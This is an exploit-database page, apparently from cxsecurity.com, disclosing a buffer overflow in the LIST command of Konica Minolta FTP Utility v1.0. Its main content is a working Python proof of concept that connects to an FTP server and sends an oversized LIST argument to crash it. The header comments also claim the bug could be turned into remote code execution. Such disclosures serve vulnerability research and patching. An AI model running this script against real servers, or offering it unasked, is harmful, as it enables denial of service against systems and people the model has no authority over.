Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)

2020.05.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================== =============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] =============== ==================================================================================================== # Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) # Date: [05-16-2020] # # Found by: Alvaro J. Gene (Socket_0x03) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www (dot) teraexe (dot) com # # Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/ # Vulnerable Application: Konica Minolta FTP Utility # Version: 1.0 # Server: FTP Server # Vulnerable Command: LIST # Tested on: Windows 7 SP1 # # Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server # "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, # such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite # some registers, an individual can use the vulnerable command to build a remote buffer # overflow exploit that will root a system without any user interaction. from ftplib import FTP ftp = FTP('192.168.0.16') buffer = "A" * 1500 ftp.login() ftp.retrlines('LIST ' + buffer)

References:

https://packetstormsecurity.com/files/157734/konicaminoltaftputility10-dos.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top